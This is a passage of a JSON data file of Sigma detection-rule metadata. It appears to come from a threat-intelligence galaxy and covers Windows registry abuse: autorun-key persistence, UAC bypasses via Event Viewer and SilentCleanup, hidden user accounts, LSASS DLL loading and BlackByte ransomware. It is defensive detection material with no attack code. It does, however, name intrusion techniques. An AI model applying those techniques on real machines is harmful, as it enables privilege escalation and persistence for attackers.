- "falsepositive": [ - "Creation of non-default, legitimate at usage" - ], - "filename": "registry_event_susp_atbroker_change.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", - "value": "Atbroker Registry Change" - }, - { - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Software installers downloaded and used by users" - ], - "filename": "registry_event_susp_download_run_key.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "value": "Suspicious Run Key from Download" - }, - { - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_susp_lsass_dll_load.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - "https://twitter.com/SBousseaden/status/1183745981189427200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" - ] - }, - "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "value": "DLL Load via LSASS" - }, - { - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "meta": { - "author": "Den Iuzvyk", - "creation_date": "2020/06/07", - "falsepositive": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" - ], - "filename": "registry_event_susp_mic_cam_access.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" - ] - }, - "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", - "value": "Suspicious Camera and Microphone Access" - }, - { - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "registry_event_trust_record_modification.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", - "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", - "value": "Windows Registry Trust Record Modification" - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ] - }, - "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", - "value": "Abusing Windows Telemetry For Persistence - Registry" - }, - { - "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_hidden_user.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", - "value": "User Account Hidden By Registry" - }, - { - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_load_service_in_safe_mode.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "value": "Registry Persitence via Service in Safe Mode" - }, - { - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_add_port_monitor.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "value": "Add Port Monitor Persistence in Registry" - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "filename": "registry_set_aedebug_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/aedebug.html", - "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "092af964-4233-4373-b4ba-d86ea2890288", - "value": "Add Debugger Entry To AeDebug For Persistence" - }, - { - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitmate use of the feature (alerts should be investigated either way)" - ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "value": "Allow RDP Remote Assistance Feature" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "9df5f547-c86a-433e-b533-f2794357e242", - "value": "Classes Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_common.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", - "value": "Common Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "value": "CurrentControlSet Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "value": "CurrentVersion Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", - "value": "CurrentVersion NT Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", - "value": "Internet Explorer Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_office.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "value": "Office Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" - ] - }, - "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "value": "Session Manager Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", - "value": "System Scripts Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", - "value": "WinSock2 Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", - "value": "Wow6432Node CurrentVersion Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "value": "Wow6432Node Classes Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", - "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" - }, - { - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "meta": { - "author": "frack113", - "creation_date": "2022/01/24", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_blackbyte_ransomware.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "83314318-052a-4c90-a1ad-660ece38d276", - "value": "Blackbyte Ransomware Registry" - }, - { - "description": "Bypasses User Account Control using a fileless method", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "value": "Bypass UAC Using DelegateExecute" - }, - { - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "value": "Bypass UAC Using Event Viewer" - }, - { - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "meta": { - "author": "frack113", - "creation_date": "2022/01/06", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", - "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", - "value": "Bypass UAC Using SilentCleanup Task" - }, - { - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_change_rdp_port.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", - "value": "Changing RDP Port to Non Standard Number" - }, - { - "description": "Hides the file extension through modification of the registry", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "registry_set_change_security_zones.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": 